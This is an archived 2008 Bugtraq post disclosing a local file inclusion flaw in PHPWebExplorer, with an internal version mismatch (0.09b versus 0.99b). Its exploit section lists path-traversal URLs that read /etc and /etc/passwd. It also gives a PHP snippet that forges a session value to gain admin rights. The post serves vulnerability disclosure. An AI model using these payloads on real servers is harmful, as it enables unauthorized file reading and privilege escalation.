lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <615c86240810040858h18372d69g2481ee1d3956661f@mail.gmail.com>
Date: Sat, 4 Oct 2008 17:58:05 +0200
From: Pepelux <pepelux@...e-sec.org>
To: bugtraq@...urityfocus.com, bugtraq-owner@...urityfocus.com
Subject: PHPWebExplorer <= 0.09b: Local File Inclusion Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PHPWebExplorer <= 0.09b: Local File Inclusion Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$ Program: PHPWebExplorer
$ File(s) affected: main.php / edit.php
$ Version: 0.99b
$ Download: http://sourceforge.net/projects/phpwebexplorer/


Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org


-- Exploit --
If you have access to the control panel:
http://localhost/main.php?refer=d&d=../../../etc
http://localhost/edit.php?file=../../../etc/passwd

If you are not a register user but you have access to write any file to the
server (ex: a shared server where you can create an account) you can win
admin privileges creating and executing a simple PHP:

<?
session_start();
$_SESSION['logged_in']='user1';
?>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ